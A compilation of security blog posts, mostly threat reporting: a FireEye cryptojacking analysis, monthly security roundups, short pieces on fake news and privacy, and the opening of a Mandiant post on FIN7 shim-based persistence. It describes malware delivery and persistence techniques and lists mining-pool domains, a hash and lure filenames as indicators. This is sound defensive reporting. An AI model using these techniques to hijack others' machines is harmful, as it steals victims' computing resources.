FireEye iSIGHT Intelligence has examined various customer reports of browser-based cryptocurrency mining. Browser-based mining scripts have been observed on compromised websites, third-party advertising platforms, and have been legitimately placed on websites by publishers. While coin mining scripts can be embedded directly into a webpage's source code, they are frequently loaded from third-party websites. Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers, such as in the case of a compromised website. Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors. At the time of reporting, the most popular script being deployed in the wild is Coinhive. Coinhive is an open-source JavaScript library that, when loaded on a vulnerable website, can mine Monero using the site visitor's CPU resources, unbeknownst to the user, as they browse the site.

The following are some real-world examples of Coinhive being deployed in the wild:

  • In September 2017, Bleeping Computer reported that the authors of SafeBrowse, a Chrome extension with more than 140,000 users, had embedded the Coinhive script in the extension's code that allowed for the mining of Monero using users' computers and without getting their consent.
  • During mid-September 2017, users on Reddit began complaining about increased CPU usage when they navigated to a popular torrent site, The Pirate Bay (TPB). The spike in CPU usage was a result of Coinhive's script being embedded within the site's footer. According to TPB operators, it was implemented as a test to generate passive revenue for the site (Figure 8).
  • In December 2017, researchers with Sucuri reported on the presence of the Coinhive script being hosted on GitHub.io, which allows users to publish web pages directly from GitHub repositories.
  • Other reporting disclosed the Coinhive script being embedded on the Showtime domain as well as on the LA Times website, both surreptitiously mining Monero.
  • A majority of in-browser cryptojacking activity is transitory in nature and will last only as long as the user’s web browser is open. However, researchers with Malwarebytes Labs uncovered a technique that allows for continued mining activity even after the browser window is closed. The technique leverages a pop-under window surreptitiously hidden under the taskbar. As researchers pointed out, closing the browser window may not be enough to interrupt the activity, and that more advanced actions like running the Task Manager may be required.


Figure 8: Statement from TPB operators on Coinhive script

Malvertising and Exploit Kits

Malvertisements – malicious ads on legitimate websites – commonly redirect visitors of a site to an exploit kit landing page. These landing pages are designed to scan a system for vulnerabilities, exploit those vulnerabilities, and download and execute malicious code onto the system. Notably, the malicious advertisements can be placed on legitimate sites and visitors can become infected with little to no user interaction. This distribution tactic is commonly used by threat actors to widely distribute malware and has been employed in various cryptocurrency mining operations.

The following are some real-world examples of this activity:

  • In early 2018, researchers with Trend Micro reported that a modified miner script was being disseminated across YouTube via Google's DoubleClick ad delivery platform. The script was configured to generate a random number variable between 1 and 100, and when the variable was above 10 it would launch the Coinhive script coinhive.min.js, which harnessed 80 percent of the CPU power to mine Monero. When the variable was below 10 it launched a modified Coinhive script that was also configured to harness 80 percent CPU power to mine Monero. This custom miner connected to the mining pool wss[:]//ws[.]l33tsite[.]info:8443, which was likely done to avoid Coinhive's fees.
  • In April 2018, researchers with Trend Micro also discovered a JavaScript code based on Coinhive injected into an AOL ad platform. The miner used the following private mining pools: wss[:]//wsX[.]www.datasecu[.]download/proxy and wss[:]//www[.]jqcdn[.]download:8893/proxy. Examination of other sites compromised by this campaign showed that in at least some cases the operators were hosting malicious content on unsecured AWS S3 buckets.
  • Since July 16, 2017, FireEye has observed the Neptune Exploit Kit redirect to ads for hiking clubs and MP3 converter domains. Payloads associated with the latter include Monero CPU miners that are surreptitiously installed on victims' computers.
  • In January 2018, Check Point researchers discovered a malvertising campaign leading to the Rig Exploit Kit, which served the XMRig Monero miner utility to unsuspecting victims.

Mobile Cryptojacking

In addition to targeting enterprise servers and user machines, threat actors have also targeted mobile devices for cryptojacking operations. While this technique is less common, likely due to the limited processing power afforded by mobile devices, cryptojacking on mobile devices remains a threat as sustained power consumption can damage the device and dramatically shorten the battery life. Threat actors have been observed targeting mobile devices by hosting malicious cryptojacking apps on popular app stores and through drive-by malvertising campaigns that identify users of mobile browsers.

The following are some real-world examples of mobile devices being used for cryptojacking:

  • During 2014, FireEye iSIGHT Intelligence reported on multiple Android malware apps capable of mining cryptocurrency:
    • In March 2014, Android malware named "CoinKrypt" was discovered, which mined Litecoin, Dogecoin, and CasinoCoin currencies.
    • In March 2014, another form of Android malware – "Android.Trojan.MuchSad.A" or "ANDROIDOS_KAGECOIN.HBT" – was observed mining Bitcoin, Litecoin, and Dogecoin currencies. The malware was disguised as copies of popular applications, including "Football Manager Handheld" and "TuneIn Radio." Variants of this malware have reportedly been downloaded by millions of Google Play users.
    • In April 2014, Android malware named "BadLepricon," which mined Bitcoin, was identified. The malware was reportedly being bundled into wallpaper applications hosted on the Google Play store, at least several of which received 100 to 500 installations before being removed.
    • In October 2014, a type of mobile malware called "Android Slave" was observed in China; the malware was reportedly capable of mining multiple virtual currencies.
  • In December 2017, researchers with Kaspersky Labs reported on a new multi-faceted Android malware capable of a variety of actions including mining cryptocurrencies and launching DDoS attacks. The resource load created by the malware has reportedly been high enough that it can cause the battery to bulge and physically destroy the device. The malware, dubbed Loapi, is unique in the breadth of its potential actions. It has a modular framework that includes modules for malicious advertising, texting, web crawling, Monero mining, and other activities. Loapi is thought to be the work of the same developers behind the 2015 Android malware Podec, and is usually disguised as an anti-virus app.
  • In January 2018, SophosLabs released a report detailing their discovery of 19 mobile apps hosted on Google Play that contained embedded Coinhive-based cryptojacking code, some of which were downloaded anywhere from 100,000 to 500,000 times.
  • Between November 2017 and January 2018, researchers with Malwarebytes Labs reported on a drive-by cryptojacking campaign that affected millions of Android mobile browsers to mine Monero.

Cryptojacking Spam Campaigns

FireEye iSIGHT Intelligence has observed several cryptocurrency miners distributed via spam campaigns, which is a commonly used tactic to indiscriminately distribute malware. We expect malicious actors will continue to use this method to disseminate cryptojacking code as for long as cryptocurrency mining remains profitable.

In late November 2017, FireEye researchers identified a spam campaign delivering a malicious PDF attachment designed to appear as a legitimate invoice from the largest port and container service in New Zealand: Lyttelton Port of Chistchurch (Figure 9). Once opened, the PDF would launch a PowerShell script that downloaded a Monero miner from a remote host. The malicious miner connected to the pools supportxmr.com and nanopool.org.


Figure 9: Sample lure attachment (PDF) that downloads malicious cryptocurrency miner

Additionally, a massive cryptojacking spam campaign was discovered by FireEye researchers during January 2018 that was designed to look like legitimate financial services-related emails. The spam email directed victims to an infection link that ultimately dropped a malicious ZIP file onto the victim's machine. Contained within the ZIP file was a cryptocurrency miner utility (MD5: 80b8a2d705d5b21718a6e6efe531d493) configured to mine Monero and connect to the minergate.com pool. While each of the spam email lures and associated ZIP filenames were different, the same cryptocurrency miner sample was dropped across all observed instances (Table 2).

ZIP Filenames

california_540_tax_form_2013_instructions.exe

state_bank_of_india_money_transfer_agency.exe

format_transfer_sms_banking_bni_ke_bca.exe

confirmation_receipt_letter_sample.exe

sbi_online_apply_2015_po.exe

estimated_tax_payment_coupon_irs.exe

how_to_add_a_non_us_bank_account_to_paypal.exe

western_union_money_transfer_from_uk_to_bangladesh.exe

can_i_transfer_money_from_bank_of_ireland_to_aib_online.exe

how_to_open_a_business_bank_account_with_bad_credit_history.exe

apply_for_sbi_credit_card_online.exe

list_of_lucky_winners_in_dda_housing_scheme_2014.exe

Table 2: Sampling of observed ZIP filenames delivering cryptocurrency miner

Cryptojacking Worms

Following the WannaCry attacks, actors began to increasingly incorporate self-propagating functionality within their malware. Some of the observed self-spreading techniques have included copying to removable drives, brute forcing SSH logins, and leveraging the leaked NSA exploit EternalBlue. Cryptocurrency mining operations significantly benefit from this functionality since wider distribution of the malware multiplies the amount of CPU resources available to them for mining. Consequently, we expect that additional actors will continue to develop this capability.

The following are some real-world examples of cryptojacking worms:

  • In May 2017, Proofpoint reported a large campaign distributing mining malware "Adylkuzz." This cryptocurrency miner was observed leveraging the EternalBlue exploit to rapidly spread itself over corporate LANs and wireless networks. This activity included the use of the DoublePulsar backdoor to download Adylkuzz. Adylkuzz infections create botnets of Windows computers that focus on mining Monero.
  • Security researchers with Sensors identified a Monero miner worm, dubbed "Rarogminer," in April 2018 that would copy itself to removable drives each time a user inserted a flash drive or external HDD.
  • In January 2018, researchers at F5 discovered a new Monero cryptomining botnet that targets Linux machines. PyCryptoMiner is based on Python script and spreads via the SSH protocol. The bot can also use Pastebin for its command and control (C2) infrastructure. The malware spreads by trying to guess the SSH login credentials of target Linux systems. Once that is achieved, the bot deploys a simple base64-encoded Python script that connects to the C2 server to download and execute more malicious Python code.

Detection Avoidance Methods

Another trend worth noting is the use of proxies to avoid detection. The implementation of mining proxies presents an attractive option for cyber criminals because it allows them to avoid developer and commission fees of 30 percent or more. Avoiding the use of common cryptojacking services such as Coinhive, Cryptloot, and Deepminer, and instead hosting cryptojacking scripts on actor-controlled infrastructure, can circumvent many of the common strategies taken to block this activity via domain or file name blacklisting.

In March 2018, Bleeping Computer reported on the use of cryptojacking proxy servers and determined that as the use of cryptojacking proxy services increases, the effectiveness of ad blockers and browser extensions that rely on blacklists decreases significantly.

Several mining proxy tools can be found on GitHub, such as the XMRig Proxy tool, which greatly reduces the number of active pool connections, and the CoinHive Stratum Mining Proxy, which uses Coinhive’s JavaScript mining library to provide an alternative to using official Coinhive scripts and infrastructure.

In addition to using proxies, actors may also establish their own self-hosted miner apps, either on private servers or cloud-based servers that supports Node.js. Although private servers may provide some benefit over using a commercial mining service, they are still subject to easy blacklisting and require more operational effort to maintain. According to Sucuri researchers, cloud-based servers provide many benefits to actors looking to host their own mining applications, including:

  • Available free or at low-cost
  • No maintenance, just upload the crypto-miner app
  • Harder to block as blacklisting the host address could potentially impact access to legitimate services
  • Resilient to permanent takedown as new hosting accounts can more easily be created using disposable accounts

The combination of proxies and crypto-miners hosted on actor-controlled cloud infrastructure presents a significant hurdle to security professionals, as both make cryptojacking operations more difficult to detect and take down.

Mining Victim Demographics

Based on data from FireEye detection technologies, the detection of cryptocurrency miner malware has increased significantly since the beginning of 2018 (Figure 10), with the most popular mining pools being minergate and nanopool (Figure 11), and the most heavily affected country being the U.S. (Figure 12). Consistent with other reporting, the education sector remains most affected, likely due to more relaxed security controls across university networks and students taking advantage of free electricity to mine cryptocurrencies (Figure 13).


Figure 10: Cryptocurrency miner detection activity per month


Figure 11: Commonly observed pools and associated ports


Figure 12: Top 10 affected countries


Figure 13: Top five affected industries


Figure 14: Top affected industries by country

Mitigation Techniques

Unencrypted Stratum Sessions

According to security researchers at Cato Networks, in order for a miner to participate in pool mining, the infected machine will have to run native or JavaScript-based code that uses the Stratum protocol over TCP or HTTP/S. The Stratum protocol uses a publish/subscribe architecture where clients will send subscription requests to join a pool and servers will send messages (publish) to its subscribed clients. These messages are simple, readable, JSON-RPC messages. Subscription requests will include the following entities: id, method, and params (Figure 15). A deep packet inspection (DPI) engine can be configured to look for these parameters in order to block Stratum over unencrypted TCP.


Figure 15: Stratum subscription request parameters

Encrypted Stratum Sessions

In the case of JavaScript-based miners running Stratum over HTTPS, detection is more difficult for DPI engines that do not decrypt TLS traffic. To mitigate encrypted mining traffic on a network, organizations may blacklist the IP addresses and domains of popular mining pools. However, the downside to this is identifying and updating the blacklist, as locating a reliable and continually updated list of popular mining pools can prove difficult and time consuming.

Browser-Based Sessions

Identifying and detecting websites that have embedded coin mining code can be difficult since not all coin mining scripts are authorized by website publishers (as in the case of a compromised website). Further, in cases where coin mining scripts were authorized by a website owner, they are not always clearly communicated to site visitors.

As defenses evolve to prevent unauthorized coin mining activities, so will the techniques used by actors; however, blocking some of the most common indicators that we have observed to date may be effective in combatting a significant amount of the CPU-draining mining activities that customers have reported. Generic detection strategies for browser-based cryptocurrency mining include:

  • Blocking domains known to have hosted coin mining scripts
  • Blocking websites of known mining project websites, such as Coinhive
  • Blocking scripts altogether
  • Using an ad-blocker or coin mining-specific browser add-ons
  • Detecting commonly used naming conventions
  • Alerting and blocking traffic destined for known popular mining pools

Some of these detection strategies may also be of use in blocking some mining functionality included in existing financial malware as well as mining-specific malware families.

It is important to note that JavaScript used in browser-based cryptojacking activity cannot access files on disk. However, if a host has inadvertently navigated to a website hosting mining scripts, we recommend purging cache and other browser data.

Outlook

In underground communities and marketplaces there has been significant interest in cryptojacking operations, and numerous campaigns have been observed and reported by security researchers. These developments demonstrate the continued upward trend of threat actors conducting cryptocurrency mining operations, which we expect to see a continued focus on throughout 2018. Notably, malicious cryptocurrency mining may be seen as preferable due to the perception that it does not attract as much attention from law enforcement as compared to other forms of fraud or theft. Further, victims may not realize their computer is infected beyond a slowdown in system performance.

Due to its inherent privacy-focused features and CPU-mining profitability, Monero has become one of the most attractive cryptocurrency options for cyber criminals. We believe that it will continue to be threat actors' primary cryptocurrency of choice, so long as the Monero blockchain maintains privacy-focused standards and is ASIC-resistant. If in the future the Monero protocol ever downgrades its security and privacy-focused features, then we assess with high confidence that threat actors will move to use another privacy-focused coin as an alternative.

Because of the anonymity associated with the Monero cryptocurrency and electronic wallets, as well as the availability of numerous cryptocurrency exchanges and tumblers, attribution of malicious cryptocurrency mining is very challenging for authorities, and malicious actors behind such operations typically remain unidentified. Threat actors will undoubtedly continue to demonstrate high interest in malicious cryptomining so long as it remains profitable and relatively low risk.

Security newsround: July 2018

We round up reporting and research from across the web about the latest security news and developments. This month: stress test for infosec leaders, cybercrime by the numbers, financial fine for enabling cyber fraud, third party risk leads to Ticketmaster breach, Privacy Shield in jeopardy, and a win for Wi-Fi as security improves.

Under pressure: stress levels rise for security professionals

Tense, nervous headache? You might be working in information security. A global survey of 1,600 infosec leaders has found that the role is under more stress than ever. Rising malware threats, a shortage of skilled people, and budget constraints are producing a perfect storm of pressure on professionals. The findings come from Trustwave’s 2018 Security Pressures Report. It found that the trend of increasing stress has been edging steadily upwards since its first report five years ago.

Some 54 per cent of respondents experienced more pressure to secure their organisation in 2017 compared to the previous year. More than half (55 per cent) also expect 2018 to bring more pressure than 2017 did. Dark Reading quoted Chris Schueler of Trustwave saying the pressure to perform will push security leaders to improve performance or burn out. SecurityIntelligence led with the angle that the biggest obligation facing security professionals is preventing malware. Help Net Security has a thorough summary of the findings.

There was some good news: fewer professionals reported feeling pressure to buy the latest security tech compared to past years. The full report is available to download here.

CEO fraud scam hits companies hard

CEO fraud, AKA business email compromise, was the internet crime most commonly reported to the FBI during 2017. Victims lost a combined amount of more than $676 million last year, up almost 88 per cent compared to 2016. Total cybercrime-related losses totalled $1.42 billion last year. The data comes from the FBI’s 2017 Internet Crime Report, which it compiles from public complaints to the agency. (No vendor surveys or hype here.)

The next most prominent scams were ransomware, tech support fraud, and extortion, the FBI said. Corporate data breaches rose slightly in number year on year (3,785 in 2017, up from 3,403 in 2016) but the financial hit decreased noticeably ($60.9 million in 2017 vs $95.9 million in 2016). There were broadly similar numbers of fake tech support scams between 2017 and 2016, but criminals almost doubled their money. The trends in the report could help security professionals to evaluate potential risks to their own organisation and staff.

Asset manager’s lax oversight opens door to fraud and a fine

Interesting reading for security and risk professionals in the Central Bank of Ireland’s highly detailed account of a cyber fraud. Governance failings at Appian Asset Management led to it losing €650,000 in client funds to online fraud. Although Appian subsequently replaced the funds in the client’s account, the regulator fined the firm €443,000. A CBI investigation uncovered “significant regulatory breaches and failures” at the firm, which exposed it to the fraud. It’s the first time the Irish regulator has imposed such a sanction for cyber fraud.

The fraud took place over a two-month period, starting in April 2015. The CBI said a fraudster hacked the real client’s webmail account to impersonate them during email correspondence with an Appian employee. The fraudster also used a spoofing technique to mimic that employee’s email address. The criminal intercepted messages from the genuine client and sent replies from the fake employee email to hide traces of the scam.

The press release runs to more than 3,200 words, and also goes into great detail about the gaps in policy and risk management at Appian.

Tales from the script: third-party app flaw leads to Ticketmaster data breach

As growing numbers of websites rely on third-party scripts, it’s vital to check they don’t put sites’ security at risk. That’s one of the lessons from the data breach at Ticketmaster UK. The company discovered malicious code running on its website that was introduced via a customer chat feature. This exposed sensitive data, including payment details, of around 40,000 customers. Anyone who bought a ticket on its site between September 2017 and June 2018 could be at risk, Ticketmaster warned.

On discovering the breach, Ticketmaster disabled the code across all its sites. The company contacted all affected customers, recommending they change their passwords. It published a clearly worded statement to answer consumer questions, and offered free 12-month identity monitoring.

Although this first seemed like good crisis management and proactive breach notification, the story didn’t end there. Inbenta Technologies, which developed the chat feature, weighed in with a statement shifting some blame back towards Ticketmaster. The vulnerability came from a single piece of custom JavaScript code Inbenta had written for Ticketmaster. “Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customised script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability,” Inbenta CEO Jordi Torras said.

Then Monzo, a UK bank, blogged in detail about the steps it took to protect its customers from the fallout. This included the bombshell that Ticketmaster knew about the breach in April, although the news only went public in June. Wired said these developments showed the need to thoroughly investigate potential breaches, and to remember subcontractors when assessing security risks.

Privacy Shield threat puts EU-US data sharing in doubt

US authorities have two months to start complying with Privacy Shield or else MEPs have threatened to suspend it. The EU-US data sharing framework replaced the Safe Harbor framework two years ago. Privacy Shield was supposed to extend the same rights for protecting EU citizens’ data as they have in Europe. In light of the Facebook-Cambridge Analytica scandal (both of which were certified under Privacy Shield), it seems that’s no longer the case.

MEPs consider privacy and data protection as “fundamental rights … that cannot be ‘balanced’ against commercial or political interests”. They voted 303 to 223 in favour of suspending the Privacy Shield agreement unless the US complies with it.

This could have implications for any organisation that uses a cloud service provider in the US. If they are using Privacy Shield as an adequacy decision for that agreement, they may no longer be GDPR-compliant after 1 September. Expect more developments on this over the coming months.

Welcome boost for Wi-Fi security

The Wi-Fi Alliance’s new WPA3 standard promises enhanced security for business and personal wireless networks. It will use a key establishment protocol called Simultaneous Authentication of Equals (SAE) which should prevent offline dictionary-based password cracking attempts. Announcing the standard, the Wi-Fi Alliance said the enterprise version offers “the equivalent of 192-bit cryptographic strength, providing additional protections for networks transmitting sensitive data, such as government or finance”. Hardware manufacturers including Cisco, Aruba, Broadcom and Aerohive all backed the standard.

Tripwire said WPA3 looks set to improve security for open networks, such as guest or customer networks in coffee shops, airports and hotels. The standard should also prevent passive nearby attackers from being able to monitor communication in the air. The Register said security experts have welcomed the upgrade. It quoted Professor Alan Woodward, a computer scientist at the University of Surrey in England. The new form of authentication, combined with extra strength from longer keys, is “a significant step forward”, he said.

 

The post Security newsround: July 2018 appeared first on BH Consulting.

Cyber Security Roundup for February 2018

February saw over 5,000 websites infected by cryptocurrency mining malware after a popular accessibility plugin called ‘BrowseAloud’ was compromised by hackers. This led to several UK Government and Councils websites going offline, including the Information Commissioner's Office, the Student Loans Company, and Manchester City, Camden and Croydon Council website. Symantec Researchers also announced that 'Crytojacking' attacks had increased 1,200% in the UK. Cryptojacking once involved the installation of cryptocurrency mining malware on users computers, but now it is more frequently used in-browser, by hacking a website and execute a malicious mining JavaScript as the user visits the compromised website, as with the case with the 'BrowseAloud' incident.

More than 25% of UK Councils are said to have suffered a breach in the last five years according to the privacy group Big Brother Watch, who said UK Councils are unprepared for Cyber Attacks.

There was a  fascinating report released about Artificial Intelligence (AI) Threat, written by 26 leading AI experts, the report forecasts the various malicious usages for AI, including with cybercrime, and manipulation of social media and national news media agendas.

GDPR preparation or panic, depending on your position, is gaining momentum with less than 100 days before the privacy regulation comes into force in late May. Here are some of the latest GDPR articles of note.

Digital Guardian released an interactive article where you can attempt to guess the value of various types of stolen data to cybercriminals -.Digital Guardian: Do you know your data's worth?

Bestvpns released a comprehensive infographic covering the 77 Facts About Cyber Crime we should all know about in 2018.

February was yet another frantic month for security updates, which saw Microsoft release over 50 patches, and there were new critical security updates by Adobe, Apple, Cisco, Dell, and Drupal.

NEWS
AWARENESS, EDUCATION AND THREAT INTELLIGENCE
REPORTS

Cyber Security Roundup for January 2018

2018 started with a big security alert bang after Google Security Researchers disclosed serious security vulnerabilities in just about every computer processor in use on the planet. Named 'Meltdown' and 'Spectre’, when exploited by a hacker or malware, these vulnerabilities disclose confidential data. As a result, a whole raft of critical security updates was hastily released for computer and smartphone operating systems, web browsers, and processor drivers. While processor manufacturers have been rather lethargic in reacting and producing patches for the problem, software vendors such as Microsoft, Google and Apple have reacted quickly, releasing security updates to protect their customers from the vulnerable processors, kudos to them.

The UK Information Commission's Office (ICO) heavily criticised the Carphone Warehouse for security inadequacies and fined the company £400K following their 2015 data breach, when the personal data, including bank details, of millions of Carphone Warehouse customers, was stolen by hackers, in what the company at the time described as a "sophisticated cyber attack", where have we heard that excuse before? Certainly the ICO wasn't buying that after it investigated, reporting a large number Carphone Warehouse's security failures, which included the use of software that was six years out of day,  lack of “rigorous controls” over who had login details to systems; no antivirus protection running on the servers holding data, the same root password being used on every individual server, which was known to “some 30-40 members of staff”; and the needless storage of full credit card details. The Carphone Warephone should thank their lucky stars the breach didn't occur after the General Data Protection Regulation comes into force, as with such a damning list of security failures, the company may well have been fined considerably more by ICO, when it is granted vastly greater financial sanctions and powers when the GDPR kicks in May.

The National Cyber Security Centre warned the UK national infrastructure faces serious nation-state attacks, stating it is a matter of a "when" not an "if". There also claims that the cyberattacks against the Ukraine in recent years was down to Russia testing and tuning it's nation-state cyberattacking capabilities. 

At the Davos summit, the Maersk chairman revealed his company spent a massive £200m to £240m on recovering from the recent NotPeyta ransomware outbreak, after the malware 'totally destroyed' the Maersk network. That's a huge price to pay for not regularly patching your systems.

It's no surprise that cybercriminals continue to target cryptocurrencies given the high financial rewards on offer. The most notable attack was a £290k cyber-heist from BlackWallet, where the hackers redirected 700k BlackWallet users to a fake replica BlackWallet website after compromising BlackWallet's DNS server. The replica website ran a script that transferred user cryptocurrency into the hacker's wallet, the hacker then moved currency into a different wallet platform.

In the United States, 
the Federal Trade Commission (FTC) fined toy firm VTech US$ 650,000 (£482,000) for violating a US children's privacy laws. The FTC alleged the toy company violated (COPPA) Children's Online Privacy Protection Rule by collecting personal information from hundreds of thousands of children without providing direct notice.

It was reported that a POS malware infection at Forever21 and lapses in encryption was responsible for the theft of debit and credit card details from Forever21 stores late last year. Payment card data continues to be a high valued target for cyber crooks with sophisticated attack capabilities, who are willing to invest considerable resources to achieve their aims.

Several interesting cybersecurity reports were released in January,  the Online Trust Alliance Cyber Incident & Breach Trends Report: 2017 concluded that cyber incidents have doubled in 2017 and 93% were preventable. Carbon Black's 2017 Threat Report stated non-malware-based cyber-attacks were behind the majority of cyber-incidents reported in 2017, despite the proliferation of malware available to both the professional and amateur hackers. Carbon Black also reported that ransomware attacks are inflicting significantly higher costs and the number of attacks skyrocketed during the course of the year, no surprise there.  

Malwarebytes 2017 State of Malware Report said ransomware attacks on consumers and businesses slowed down towards the end of 2017 and were being replaced by spyware campaigns, which rose by over 800% year-on-year. Spyware campaigns not only allow hackers to steal precious enterprise and user data but also allows them to identify ideal attack points to launch powerful malware attacks. The Cisco 2018 Privacy Maturity Benchmark Study claimed 74% of privacy-immature organisations were hit by losses of more than £350,000, and companies that are privacy-mature have fewer data breaches and smaller losses from cyber-attacks.

NEWS

AWARENESS, EDUCATION AND THREAT INTELLIGENCE

REPORTS

STOP FAKE NEWS – PAUSE, EVALUATE and FORWARD


The potential for fake news to turn viral using social media is quite real. There have been several instances where rumors have incited mob violence between rival communities. The consequence got out of hand when illiterate tribals in a remote Indian district received a Whatsapp message which claimed that children could be kidnapped by a gang and their body parts sold. The message went viral in these villages and mobs of upto 500 people pounced on strangers who they suspected to the child kidnappers, in all there were two incidents where 7 people were lynched.
It is quite apparent to every cybercitizen that fake or distorted news is on the rise. Social media allows every individual a platform to disseminate such news or information. Fake news is routinely posted for vested interest such as political distortion, defamation, mischief, inciting trouble and to settle personal problems.

 As aptly illustrated in the case above, when fake news goes viral the ill effects escalate to a point where they can cause physical damage, loss of life or long-term animosity between sections of society. Purposely-crafted fake/distorted news introduced over periods of time by vested interests can distort perspectives and social harmony. Such news is effectively used for ideological indoctrination.

Creation of fake news is extremely simple. Listed below are six commonly used methods

·         Individuals concoct their own stories

·         Marketers release competitive advertisements based on unproven data

·         Groups with vested interests manipulate the volume and narrative of news.

·         Photographs are morphed

·         Old photographs are used to depict recent events

·         Real photographs are used to defame

Obviously, it is also quite easy to catch the perpetrator. A few years back, a twitter hoax was dealt with by a strong reprimand, but not today. Fake news, hoaxes, rumours or any other type of content that results in incitement or defamation attract stronger penalties and jail terms. Police are more aware and vigilant.
Most cybercitizens unwitting help fake news go viral by recirculating it. It creates a sense of belief that it must be true because the other person must have validated the news before sending it.

Pause before forwarding, Evaluate veracity and then Forward. Do not be that link in the chain responsible for the circulation of Fake News
Cybercitizens, do take care when crafting messages on social media – a little mischief may provide you a few years in government paid accommodation – Jail. Advise your children to be responsible and do cross check news received over social media before recirculating or believing in it.

What is Data Privacy and why is it an important issue?

The question of whether privacy is a fundamental right is being argued before the honorable Supreme Court of India. It is a topic to which a young India is waking up too. Privacy is often equated with Liberty, and young Indians wants adequate protection to express themselves.

Privacy according to Wikipedia is the ability of an individual or group to seclude themselves, or information about themselves, and thereby express themselves selectively. There is little contention over the fact that privacy is an essential element of Liberty and the voluntary disclosure of private information is both part of human relationships and a digitized economy.

The reason for debating data privacy is due to the inherent potential for surveillance and disclosure of electronic records which constitute privacy such as sexual orientation, medical records, credit card information, and email.

Disclosure could take place due to wrongful use and distribution of the data such as for marketing, surveillance by governments or outright data theft by cyber criminals. In each case, a cybercitizens right to disclosure specific information to specific companies or people, for a specific purpose is violated.

Citizens in western countries are legally protected through data protection regulation. There are eight principles designed to prevent unauthorized use of personal data by government, organizations and individuals

Lawfulness, Fairness & Transparency
Personal data need to be processed based on the consent given by data subjects. Companies have an obligation to tell data subjects what their personal data will be used for. Data acquired cannot be sold to other entities say marketers.
Purpose limitation
Personal data collected for one purpose should not be used for a different purpose. If data was collected to deliver an insurance service, it cannot be used to market a different product.
Data minimization
Organizations should restrict collection of personal data to only those attributes needed to achieve the purpose for which consent from the data subject has been received.
Accuracy
Data has to be collected, processed and used in a manner which ensures that it is accurate. A data subject has to right to inspect and even alter the data.
Storage limitation
Personal data should be collected for a specific purpose and not be retained for longer than necessary in relation to this purposes.
Integrity and confidentiality
Organizations that collect this data are responsible for its security against data thefts and data entry/processing errors that may alter the integrity of data.
Accountability
Organizations are accountable for the data in their possession
Cross Border Personal information
Requirements.
Personal information must be processed and stored  in secured environment which must be ensured if the data is processed outside the border of the country

It is important for cybercitizens to understand their privacy rights particularly in context of information that can be misused for financial gain or to cause reputational damage.




The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report

q1 headline image - blog

Developments in Cyber-crime, Cyberwarfare and AI mark the first quarter of 2017, as indicated by PandaLabs Q1 Report. The Report by Panda Security’s malware resource facility identifies prominent tactics, attack methods and shifts in the industry.

The Cyber-crime industry continues to grow on the back of profitable attacks. The development of Ransomware-as-a-Service (RaaS) and organisations like Vdos, an organisation specialising in DDos attacks, indicate the professionalism of the cyber-crime industry. In Q1 we continue to see new and adapted attack methods such as RDPatcher, malware detected by PandaLabs in its attempt to access the victim’s endpoint and prepare it for rental on the Dark Web.

Politically motivated cyber-attacks

Fueling the continued development of the cyber-crime industry are politically motivated cyber-attacks. In recent months, Cyberwarfare has become a popular tactic in enforcing political agendas. In Q4 of 2016, we saw some of the first high profile instances of cyberwarfare, with accusations of Russia’s interference in the 2016 US elections. The gravity the development is clear as countries like Germany have now begun to develop cyber-command centres to monitor online activity – this quarter France and the Netherlands reconsidered electronic voting procedures to avoid situations like the 2016 US elections.

Targeted IoT device attacks

Targeted attacks on IoT devices continue to threaten our safety in line with the ever-increasing number of IoT devices. In February, at the European Broadcasting Union Media Cyber Security Seminar, security consultant Rafael Scheel demonstrated more ways these devices can breach unsecured networks by creating an exploit that would allow an attacker to take control of a Smart TV using only a DDT signal.

A perfect device for eavesdropping

Recent developments in Robotics and AI have led to that belief that the fourth industrial revolution is not far off. Robotics and AI technology could do more than just take over jobs – introducing virtual assistants like Google Home and Amazon Echo, can become a dangerous in road for hackers. Introduced in February 2017, Google Home can tune into your home IoT devices while waiting to be called on – making it the perfect device for eavesdropping. Police recently requested access to an Amazon Echo device as it may have held evidence that could be useful to their case.

Over the course of 2016 Ransomware attacks earned criminals billions of Rand. Fueled by its profitability, Ransomware attacks continue to increase, with new variants created daily. In Q1 PandaLabs discovered Ransomware variant WYSEWYE -that allows the attacker to select and take control of specific folders on the victim’s endpoint, ultimately demanding a ransom to give back control to the victim.

See the full report by PandaLabs here.

The post The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report appeared first on CyberSafety.co.za.

To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence

In 2017, Mandiant responded to multiple incidents we attribute to FIN7, a financially motivated threat group associated with malicious operations dating back to 2015. Throughout the various environments, FIN7 leveraged the CARBANAK backdoor, which this group has used in previous operations.

A unique aspect of the incidents was how the group installed the CARBANAK backdoor for persistent access. Mandiant identified that the group leveraged an application shim database to achieve persistence on systems in multiple environments. The shim injected a malicious in-memory patch into the Services Control Manager (“services.exe”) process, and then spawned a CARBANAK backdoor process.

Mandiant identified that FIN7 also used this technique to install a payment card harvesting utility for persistent access. This was a departure from FIN7’s previous approach of installing a malicious Windows service for process injection and persistent access.

Application Compatibility Shims Background

According to Microsoft, an application compatibility shim is a small library that transparently intercepts an API (via hooking), changes the parameters passed, handles the operation itself, or redirects the operation elsewhere, such as additional code stored on a system. Today, shims are mainly used for compatibility purposes for legacy applications. While shims serve a legitimate purpose, they can also be used in a malicious manner. Mandiant consultants previously discussed shim databases at both BruCon and BlackHat.

Shim Database Registration

There are multiple ways to register a shim database on a system. One technique is to use the built-in “sdbinst.exe” command line tool. Figure 1 displays the two registry keys created when a shim is registered with the “sdbinst.exe” utility.

Figure 1: Shim database registry keys

Once a shim database has been registered on a system, the shim database file (“.sdb” file extension) will be copied to the “C:\Windows\AppPatch\Custom” directory for 32-bit shims or “C:\Windows\AppPatch\Custom\Custom64” directory for 64-bit shims.

Malicious Shim Database Installation

To install and register the malicious shim database on a system, FIN7 used a custom Base64 encoded PowerShell script, which ran the “sdbinst.exe” utility to register a custom shim database file containing a patch onto a system. Figure 2 provides a decoded excerpt from a recovered FIN7 PowerShell script showing the parameters for this command.

Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim

